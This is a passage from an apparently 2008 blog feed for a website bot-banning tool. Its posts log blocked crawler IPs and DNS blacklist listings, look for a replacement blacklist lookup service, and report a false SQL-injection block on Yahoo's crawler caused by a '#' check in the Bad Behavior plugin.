/>[06-17-2008-16:09:29] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />75.101.211.7 ec2-75-101-211-7.compute-1.amazonaws.com <br />[06-17-2008-16:09:35] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />75.101.244.65 ec2-75-101-244-65.compute-1.amazonaws.com<br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />67.202.61.94 ec2-67-202-61-94.compute-1.amazonaws.com <br /><br /><br />Update <br /><br />67.202.31.132 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.61.94 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.23.83 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.21.42 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.23.122 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.34.44 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.57.15 is BLACKLISTED by dnsbl.njabl.org for spam<br /><br /><br />The following comment is associated with this record: This network is a member of a dynamic hosting environment. See http://ec2.amazonaws.com/<br />It was added to the list: Tue Apr 1 12:41:39 2008 EST<br /><br />spam source means the system was found via manual spam header parsing to be the origin of spam.<br /><br />update july 15th <br />Agent: firefox/2.0.0.6 (ubuntu-feisty) <br />72.44.48.95 ec2-72-44-48-95.compute-1.amazonaws.com<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com9tag:blogger.com,1999:blog-33923218.post-45226038013555871832008-06-17T12:57:00.002-05:002008-06-17T13:08:59.180-05:00openrbl.org is goneopenrbl.org is down and I need a replacement that can do a lookup on all of the block list and do a DNS lookup. <br /><br />I did find a replacement of sorts. Change the admin.php $dns_lookup setting to.<br /><br />$dns_lookup ="http://www.robtex.com/rbl/";<br /><br /><br />If anyone knows of one please post it.<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-14325360906582303592008-06-06T12:44:00.000-05:002008-06-06T12:44:28.865-05:00Request contained a malicious JavaScript or SQL injection attackbad-behavior is now blocking what it says is a SQL injection but all its really looking for is a # in the header. So I end up seeing crap like this.<br /><br />I think this may be a bug in bad behavior<br /><br />Update: I am still seeing this from the Yahoo bot<br /><br />403 Request contained a malicious JavaScript or SQL injection attack <br />Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) <br />74.6.8.122 llf520018.crawl.yahoo.net <br /><br />403 Request contained a malicious JavaScript or SQL injection attack <br />Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) <br />74.6.17.186 llf520164.crawl.yahoo.net <br /><br />403 Request contained a malicious JavaScript or SQL injection attack www.winnfreenet.com <br />Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) <br />74.6.22.159 llf520079.crawl.yahoo.net <br /><br /><br /><br /> // Broken spambots send URLs with various invalid characters<br /> // Some broken browsers send the #vector in the referer field :(<br /> if (strpos($package['request_uri'], "#") !== FALSE) {<br /> return "dfd9b1ad";<br /> }<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0tag:blogger.com,1999:blog-33923218.post-7916663646988210032008-06-02T23:57:00.001-05:002008-06-03T00:01:00.953-05:00robot on pox1s.craigslist.orgWhy would craigslist.org be running a bot?<br /><br />403 Required header 'Accept' missing <br />Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2 <br />66.150.243.17 pox1s.craigslist.org<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com1tag:blogger.com,1999:blog-33923218.post-19459390223797288482008-06-01T18:08:00.002-05:002008-06-01T18:15:45.563-05:00barton.centeralnet.com botAgent: -NO AGENT- <br />216.32.80.66 barton.centeralnet.com <br /><br />Some type of webhosting company in IRAN<div class="blogger-post-footer">Get M&M Autoban to protect your website.</div>tmasternoreply@blogger.com0